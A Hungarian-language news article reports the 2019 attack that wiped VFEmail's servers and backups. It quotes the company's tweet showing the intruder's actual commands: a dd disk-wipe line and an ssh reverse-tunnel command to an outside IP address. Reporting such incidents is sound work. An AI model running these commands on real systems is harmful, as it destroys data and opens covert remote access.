Milyen érzés lenne, ha reggel benéznél a levelezésedbe, és az összes levél, amit életedben küldtél vagy kaptál, nyomtalanul eltűnne? És az milyen lenne, ha mindenki mással is ez történt volna, aki ugyanezt a szolgáltatást használja? Nos, az amerikai VFEmail szolgáltatónál megtörtént az, ami minden internetes cég legdurvább rémálma még úgy is, hogy a különféle hacker-betörések és adatszivárgások már kezdenek mindennapossá válni világszerte. A céget ért kibertámadás a lehető legsúlyosabb eredménnyel járt, ami valaha megtörténhetett.
Bár Magyarországon bizonyára nem sokan ismerik, a VFEmail sokak kedvence az óceán túlpartján, méghozzá pont azért, mert az üzemeltetők ingyenes, de biztonságos, garantáltan vírusmentes szolgáltatást ígértek, amelyet ráadásul mindenki saját kedvenc kliensével használhatott. A céget 2001-ben indították el, pont egy levelezőrendszereken keresztül terjedő vírus, az "ILOVEYOU" féreg megjelenése után, mivel akkoriban a vírusszűrés még semmilyen e-mail szolgáltatónál nem volt a rendszer alapértelmezett része. Szóval pont ezért (is) irtózatos nagy pofon a mostani eset.
Ahogy azt a céget alapító Rick Romero Twitteren is megerősítette, hackerek törtek be a rendszerükbe, és nem elégedtek meg azzal, hogy más esetekhez hasonlóan adatokat szipkázzanak át magukhoz - sőt, azt egyelőre nem is lehet megállapítani, megszereztek-e bármit. Ugyanis a támadók nemes egyszerűséggel leformáztak minden háttértárat, ami a szolgáltatáshoz kapcsolódik, ebbe beleértve az összes biztonsági mentést tartalmazó egységet is. Szóval a VFEmail ügyfelei egyik napról a másikra az összes levelüket, csatolmányukat, címüket és jogosultságukat elveszítették, és a jelek szerint nincs is remény arra, hogy bármilyen módon vissza lehessen állítani ezekből bármit.
Yes, @VFEmail is effectively gone. It will likely not return.
— Havokmon (@Havokmon) February 12, 2019
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.
A betörést ugyan észrevették, amikor leálltak a szolgáltatás szerverei, ám már csak akkor sikerült megállítani a folyamatot, amikor a hackerek a fő tárolókat teljesen leformázták és a backup meghajtók felével is végeztek. Épp ezért a kár a teljes rendszert érinti, így nem is helyreállítható.
Caught the perp in the middle of formatting the backup server:
— VFEmail.net (@VFEmail) February 11, 2019
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
Mindenesetre "nulláról" újraindították a szolgáltatást, a VFEmail ismét működik, de a felhasználóknak újra regisztrálniuk kell, és teljesen üres fiókkal találkoznak belépés után. Hogy mi lehetett a támadó motivációja, az egyelőre rejtély, hiszen zsarolóvírusok, vagy jelszavakat megszerző hackerek fenyegetőznek ugyan azzal, hogy ilyesmi lesz a vége, ha nem teljesítik a követeléseiket, de a cég állítása szerint semmi ilyesmire utaló jelzést nem kaptak az esetet megelőzően. Mostanáig annyit derítettek ki, hogy egy bolgár IP címet használt és két mesterjelszó használatával jutott be a cég belső rendszerébe.
